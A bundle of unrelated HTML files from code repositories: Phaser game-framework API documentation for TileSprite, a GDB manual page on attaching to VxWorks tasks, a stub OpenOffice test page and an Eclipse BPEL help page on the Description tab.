<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-121">line 121</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="checkWorldBounds"><span class="type-signature"></span>checkWorldBounds<span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>If true the Sprite checks if it is still within the world each frame, when it leaves the world it dispatches Sprite.events.onOutOfBounds
and optionally kills the sprite (if Sprite.outOfBoundsKill is true). By default this is disabled because the Sprite has to calculate its
bounds every frame to support it, and not all games need it. Enable it by setting the value to true.</p>
</div>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>checkWorldBounds</code></td>
<td class="type">
<span class="param-type">boolean</span>
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-default">Default Value:</dt>
<dd class="tag-default"><ul class="dummy"><li>false</li></ul></dd>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-116">line 116</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="destroyPhase"><span class="type-signature"></span>destroyPhase<span class="type-signature"></span></h4>
</dt>
<dd>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>destroyPhase</code></td>
<td class="type">
<span class="param-type">boolean</span>
</td>
<td class="description last"><p>True if this object is currently being destroyed.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-779">line 779</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="events"><span class="type-signature"></span>events<span class="type-signature"></span></h4>
</dt>
<dd>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>events</code></td>
<td class="type">
<span class="param-type"><a href="Phaser.Events.html">Phaser.Events</a></span>
</td>
<td class="description last"><p>The Events you can subscribe to that are dispatched when certain things happen on this Sprite or its components.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-55">line 55</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="exists"><span class="type-signature"></span>exists<span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>TileSprite.exists controls if the core game loop and physics update this TileSprite or not.
When you set TileSprite.exists to false it will remove its Body from the physics world (if it has one) and also set TileSprite.visible to false.
Setting TileSprite.exists to true will re-add the Body to the physics world (if it has a body) and set TileSprite.visible to true.</p>
</div>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>exists</code></td>
<td class="type">
<span class="param-type">boolean</span>
</td>
<td class="description last"><p>If the TileSprite is processed by the core game update and physics.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-637">line 637</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="fixedToCamera"><span class="type-signature"></span>fixedToCamera<span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>An TileSprite that is fixed to the camera uses its x/y coordinates as offsets from the top left of the camera. These are stored in TileSprite.cameraOffset.
Note that the cameraOffset values are in addition to any parent in the display list.
So if this TileSprite was in a Group that has x: 200, then this will be added to the cameraOffset.x</p>
</div>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>fixedToCamera</code></td>
<td class="type">
<span class="param-type">boolean</span>
</td>
<td class="description last"><p>Set to true to fix this TileSprite to the Camera at its current world coordinates.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-606">line 606</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="frame"><span class="type-signature"></span>frame<span class="type-signature"></span></h4>
</dt>
<dd>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>frame</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last"><p>Gets or sets the current frame index and updates the Texture Cache for display.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-564">line 564</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="frameName"><span class="type-signature"></span>frameName<span class="type-signature"></span></h4>
</dt>
<dd>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>frameName</code></td>
<td class="type">
<span class="param-type">string</span>
</td>
<td class="description last"><p>Gets or sets the current frame name and updates the Texture Cache for display.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-585">line 585</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="game"><span class="type-signature"></span>game<span class="type-signature"></span></h4>
</dt>
<dd>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>game</code></td>
<td class="type">
<span class="param-type"><a href="Phaser.Game.html">Phaser.Game</a></span>
</td>
<td class="description last"><p>A reference to the currently running Game.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-33">line 33</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="input"><span class="type-signature"></span>input<span class="type-signature"></span></h4>
</dt>
<dd>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>input</code></td>
<td class="type">
<span class="param-type"><a href="Phaser.InputHandler.html">Phaser.InputHandler</a></span>
|
<span class="param-type">null</span>
</td>
<td class="description last"><p>The Input Handler for this object. Needs to be enabled with image.inputEnabled = true before you can use it.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-92">line 92</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="inputEnabled"><span class="type-signature"></span>inputEnabled<span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>By default a TileSprite won't process any input events at all. By setting inputEnabled to true the Phaser.InputHandler is
activated for this object and it will then start to process click/touch events and more.</p>
</div>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>inputEnabled</code></td>
<td class="type">
<span class="param-type">boolean</span>
</td>
<td class="description last"><p>Set to true to allow this object to receive input events.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-684">line 684</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="key"><span class="type-signature"></span>key<span class="type-signature"></span></h4>
</dt>
<dd>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>key</code></td>
<td class="type">
<span class="param-type">string</span>
|
<span class="param-type"><a href="Phaser.RenderTexture.html">Phaser.RenderTexture</a></span>
|
<span class="param-type"><a href="Phaser.BitmapData.html">Phaser.BitmapData</a></span>
|
<span class="param-type">PIXI.Texture</span>
</td>
<td class="description last"><p>This is the image or texture used by the Sprite during rendering. It can be a string which is a reference to the Cache entry, or an instance of a RenderTexture, BitmapData or PIXI.Texture.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-65">line 65</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="name"><span class="type-signature"></span>name<span class="type-signature"></span></h4>
</dt>
<dd>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>name</code></td>
<td class="type">
<span class="param-type">string</span>
</td>
<td class="description last"><p>The user defined name given to this Sprite.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-39">line 39</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="type"><span class="type-signature"><readonly> </span>type<span class="type-signature"></span></h4>
</dt>
<dd>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>type</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last"><p>The const type of this object.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-45">line 45</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="world"><span class="type-signature"></span>world<span class="type-signature"></span></h4>
</dt>
<dd>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>world</code></td>
<td class="type">
<span class="param-type"><a href="Phaser.Point.html">Phaser.Point</a></span>
</td>
<td class="description last"><p>The world coordinates of this Sprite. This differs from the x/y coordinates which are relative to the Sprites container.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-97">line 97</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="x"><span class="type-signature"></span>x<span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>The position of the TileSprite on the x axis relative to the local coordinates of the parent.</p>
</div>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>x</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last"><p>The position of the TileSprite on the x axis relative to the local coordinates of the parent.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-725">line 725</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="y"><span class="type-signature"></span>y<span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>The position of the TileSprite on the y axis relative to the local coordinates of the parent.</p>
</div>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>y</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last"><p>The position of the TileSprite on the y axis relative to the local coordinates of the parent.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-752">line 752</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="z"><span class="type-signature"></span>z<span class="type-signature"></span></h4>
</dt>
<dd>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>z</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last"><p>The z-depth value of this object within its Group (remember the World is a Group as well). No two objects in a Group can have the same z value.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-50">line 50</a>
</li></ul></dd>
</dl>
</dd>
</dl>
<h3 class="subsection-title">Methods</h3>
<dl>
<dt>
<h4 class="name" id="autoScroll"><span class="type-signature"></span>autoScroll<span class="signature">()</span><span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>Sets this TileSprite to automatically scroll in the given direction until stopped via TileSprite.stopScroll().
The scroll speed is specified in pixels per second.
A negative x value will scroll to the left. A positive x value will scroll to the right.
A negative y value will scroll up. A positive y value will scroll down.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-297">line 297</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="destroy"><span class="type-signature"></span>destroy<span class="signature">(<span class="optional">destroyChildren</span>)</span><span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>Destroys the TileSprite. This removes it from its parent group, destroys the event and animation handlers if present
and nulls its reference to game, freeing it up for garbage collection.</p>
</div>
<h5>Parameters:</h5>
<table class="params table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th>Argument</th>
<th>Default</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>destroyChildren</code></td>
<td class="type">
<span class="param-type">boolean</span>
</td>
<td class="attributes">
<optional><br>
</td>
<td class="default">
true
</td>
<td class="description last"><p>Should every child of this object have its destroy method called?</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-421">line 421</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="loadTexture"><span class="type-signature"></span>loadTexture<span class="signature">(key, frame)</span><span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>Changes the Texture the TileSprite is using entirely. The old texture is removed and the new one is referenced or fetched from the Cache.
This causes a WebGL texture update, so use sparingly or in low-intensity portions of your game.</p>
</div>
<h5>Parameters:</h5>
<table class="params table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>key</code></td>
<td class="type">
<span class="param-type">string</span>
|
<span class="param-type"><a href="Phaser.RenderTexture.html">Phaser.RenderTexture</a></span>
|
<span class="param-type"><a href="Phaser.BitmapData.html">Phaser.BitmapData</a></span>
|
<span class="param-type">PIXI.Texture</span>
</td>
<td class="description last"><p>This is the image or texture used by the TileSprite during rendering. It can be a string which is a reference to the Cache entry, or an instance of a RenderTexture, BitmapData or PIXI.Texture.</p></td>
</tr>
<tr>
<td class="name"><code>frame</code></td>
<td class="type">
<span class="param-type">string</span>
|
<span class="param-type">number</span>
</td>
<td class="description last"><p>If this TileSprite is using part of a sprite sheet or texture atlas you can specify the exact frame to use by giving a string or numeric index.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-324">line 324</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="play"><span class="type-signature"></span>play<span class="signature">(name, <span class="optional">frameRate</span>, <span class="optional">loop</span>, <span class="optional">killOnComplete</span>)</span><span class="type-signature"> → {<a href="Phaser.Animation.html">Phaser.Animation</a>}</span></h4>
</dt>
<dd>
<div class="description">
<p>Play an animation based on the given key. The animation should previously have been added via sprite.animations.add()
If the requested animation is already playing this request will be ignored. If you need to reset an already running animation do so directly on the Animation object itself.</p>
</div>
<h5>Parameters:</h5>
<table class="params table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th>Argument</th>
<th>Default</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>name</code></td>
<td class="type">
<span class="param-type">string</span>
</td>
<td class="attributes">
</td>
<td class="default">
</td>
<td class="description last"><p>The name of the animation to be played, e.g. "fire", "walk", "jump".</p></td>
</tr>
<tr>
<td class="name"><code>frameRate</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="attributes">
<optional><br>
</td>
<td class="default">
null
</td>
<td class="description last"><p>The framerate to play the animation at. The speed is given in frames per second. If not provided the previously set frameRate of the Animation is used.</p></td>
</tr>
<tr>
<td class="name"><code>loop</code></td>
<td class="type">
<span class="param-type">boolean</span>
</td>
<td class="attributes">
<optional><br>
</td>
<td class="default">
false
</td>
<td class="description last"><p>Should the animation be looped after playback. If not provided the previously set loop value of the Animation is used.</p></td>
</tr>
<tr>
<td class="name"><code>killOnComplete</code></td>
<td class="type">
<span class="param-type">boolean</span>
</td>
<td class="attributes">
<optional><br>
</td>
<td class="default">
false
</td>
<td class="description last"><p>If set to true when the animation completes (only happens if loop=false) the parent Sprite will be killed.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-486">line 486</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>A reference to playing Animation instance.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type"><a href="Phaser.Animation.html">Phaser.Animation</a></span>
</dd>
</dl>
</dd>
<dt>
<h4 class="name" id="postUpdate"><span class="type-signature"></span>postUpdate<span class="signature">()</span><span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>Internal function called by the World postUpdate cycle.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-269">line 269</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="preUpdate"><span class="type-signature"></span>preUpdate<span class="signature">()</span><span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>Automatically called by World.preUpdate.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-159">line 159</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="reset"><span class="type-signature"></span>reset<span class="signature">(x, y)</span><span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>Resets the TileSprite. This places the TileSprite at the given x/y world coordinates, resets the tilePosition and then
sets alive, exists, visible and renderable all to true. Also resets the outOfBounds state.
If the TileSprite has a physics body that too is reset.</p>
</div>
<h5>Parameters:</h5>
<table class="params table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>x</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last"><p>The x coordinate (in world space) to position the Sprite at.</p></td>
</tr>
<tr>
<td class="name"><code>y</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last"><p>The y coordinate (in world space) to position the Sprite at.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-504">line 504</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>(Phaser.TileSprite) This instance.</p>
</div>
</dd>
<dt>
<h4 class="name" id="setFrame"><span class="type-signature"></span>setFrame<span class="signature">(frame)</span><span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>Sets the Texture frame the TileSprite uses for rendering.
This is primarily an internal method used by TileSprite.loadTexture, although you may call it directly.</p>
</div>
<h5>Parameters:</h5>
<table class="params table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>frame</code></td>
<td class="type">
<span class="param-type"><a href="Phaser.Frame.html">Phaser.Frame</a></span>
</td>
<td class="description last"><p>The Frame to be used by the TileSprite texture.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-374">line 374</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="stopScroll"><span class="type-signature"></span>stopScroll<span class="signature">()</span><span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>Stops an automatically scrolling TileSprite.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-312">line 312</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="update"><span class="type-signature"></span>update<span class="signature">()</span><span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>Override and use this function in your own custom objects to handle any update requirements you may have.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-259">line 259</a>
</li></ul></dd>
</dl>
</dd>
</dl>
</article>
</section>
</div>
<div class="clearfix"></div>
<footer>
<span class="copyright">
Phaser Copyright © 2012-2014 Photon Storm Ltd.
</span>
<br />
<span class="jsdoc-message">
Documentation generated by <a href="https://github.com/jsdoc3/jsdoc">JSDoc 3.3.0-dev</a>
on Fri Jul 18 2014 12:36:57 GMT+0100 (BST) using the <a href="https://github.com/terryweiss/docstrap">DocStrap template</a>.
</span>
</footer>
</div>
<div class="span3">
<div id="toc"></div>
</div>
<br clear="both">
</div>
</div>
<script src="scripts/sunlight.js"></script>
<script src="scripts/sunlight.javascript.js"></script>
<script src="scripts/sunlight-plugin.doclinks.js"></script>
<script src="scripts/sunlight-plugin.linenumbers.js"></script>
<script src="scripts/sunlight-plugin.menu.js"></script>
<script src="scripts/jquery.min.js"></script>
<script src="scripts/jquery.scrollTo.js"></script>
<script src="scripts/jquery.localScroll.js"></script>
<script src="scripts/bootstrap-dropdown.js"></script>
<script src="scripts/toc.js"></script>
<script> Sunlight.highlightAll({lineNumbers:true, showMenu: true, enableDoclinks :true}); </script>
<script>
$( function () {
$( "#toc" ).toc( {
anchorName : function(i, heading, prefix) {
return $(heading).attr("id") || ( prefix + i );
},
selectors : "h1,h2,h3,h4",
showAndHide : false,
scrollTo : 60
} );
$( "#toc>ul" ).addClass( "nav nav-pills nav-stacked" );
$( "#main span[id^='toc']" ).addClass( "toc-shim" );
} );
</script>
</body>
</html>
|
toolchain/share/doc/arm-arm-none-eabi/html/gdb/VxWorks-Attach.html
|
byeonggonlee/lynx-ns-gb
|
<html lang="en">
<head>
<title>VxWorks Attach - Debugging with GDB</title>
<meta http-equiv="Content-Type" content="text/html">
<meta name="description" content="Debugging with GDB">
<meta name="generator" content="makeinfo 4.13">
<link title="Top" rel="start" href="index.html#Top">
<link rel="up" href="VxWorks.html#VxWorks" title="VxWorks">
<link rel="prev" href="VxWorks-Download.html#VxWorks-Download" title="VxWorks Download">
<link href="http://www.gnu.org/software/texinfo/" rel="generator-home" title="Texinfo Homepage">
<!--
Copyright (C) 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995, 1996,
1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010
Free Software Foundation, Inc.
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.3 or
any later version published by the Free Software Foundation; with the
Invariant Sections being ``Free Software'' and ``Free Software Needs
Free Documentation'', with the Front-Cover Texts being ``A GNU Manual,''
and with the Back-Cover Texts as in (a) below.
(a) The FSF's Back-Cover Text is: ``You are free to copy and modify
this GNU Manual. Buying copies from GNU Press supports the FSF in
developing GNU and promoting software freedom.''-->
<meta http-equiv="Content-Style-Type" content="text/css">
<style type="text/css"><!--
pre.display { font-family:inherit }
pre.format { font-family:inherit }
pre.smalldisplay { font-family:inherit; font-size:smaller }
pre.smallformat { font-family:inherit; font-size:smaller }
pre.smallexample { font-size:smaller }
pre.smalllisp { font-size:smaller }
span.sc { font-variant:small-caps }
span.roman { font-family:serif; font-weight:normal; }
span.sansserif { font-family:sans-serif; font-weight:normal; }
--></style>
<link rel="stylesheet" type="text/css" href="../cs.css">
</head>
<body>
<div class="node">
<a name="VxWorks-Attach"></a>
<p>
Previous: <a rel="previous" accesskey="p" href="VxWorks-Download.html#VxWorks-Download">VxWorks Download</a>,
Up: <a rel="up" accesskey="u" href="VxWorks.html#VxWorks">VxWorks</a>
<hr>
</div>
<h5 class="subsubsection">21.2.1.3 Running Tasks</h5>
<p><a name="index-running-VxWorks-tasks-1279"></a>You can also attach to an existing task using the <code>attach</code> command as
follows:
<pre class="smallexample"> (vxgdb) attach <var>task</var>
</pre>
<p class="noindent">where <var>task</var> is the VxWorks hexadecimal task ID. The task can be running
or suspended when you attach to it. Running tasks are suspended at
the time of attachment.
</body></html>
|
desktop/test/deployment/update/publisher/publisher_en-region3.html
|
sbbic/core
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
</HEAD>
<BODY>
<H1>My OpenOffice en-region3</H1>
</BODY>
</HTML>
|
plugins/org.eclipse.bpel.help/html/Reference/UniqueProperties/descriptionTab.html
|
Drifftr/devstudio-tooling-bps
|
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="CONTENT-TYPE" />
<link rel="stylesheet" href="../../book.css" type="text/css" />
<title>Description Tab</title>
</head>
<body>
<h1>Description Tab</h1>
<p><img src="../../../images/reference/Property_Sheet_01.png" alt="Description tab" /></p>
<p><b>Description tab</b></p>
<p>
The <strong>Description</strong> tab allows you to change the process name and its namespace URI. All
namespaces should follow the W3C recommendation (<a href="http://www.w3.org/2005/07/13-nsuri">http://www.w3.org/2005/07/13-nsuri</a>.
</p>
</body>
</html>
|
